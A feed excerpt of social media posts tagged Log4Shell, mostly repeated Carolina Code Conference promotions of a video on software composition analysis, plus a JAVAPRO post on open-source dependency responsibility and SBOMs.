    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  42. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  43. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #vulnerability #cybersecurity #softwareanalysis #log4shell #shorts
  44. Carolina Code Conference @[email protected] ·

    ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  45. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  46. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  47. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  48. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #vulnerability #cybersecurity #softwareanalysis #log4shell #shorts
  49. Carolina Code Conference @[email protected] ·

    Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

    #shorts #log4shell #softwareanalysis #cybersecurity #vulnerability
  50. JAVAPRO @[email protected] ·

    Who is responsible for your #Java dependencies when upstream disappears? @spoole167 traces how #Log4Shell exposed the reality of #OpenSource maintenance and why SBOMs, CRA & NIS2 changed the rules.

    Learn what “responsibility” means now: javapro.io/2026/01/08/the-myth

    #SupplyChain

    #java #log4shell #opensource #supplychain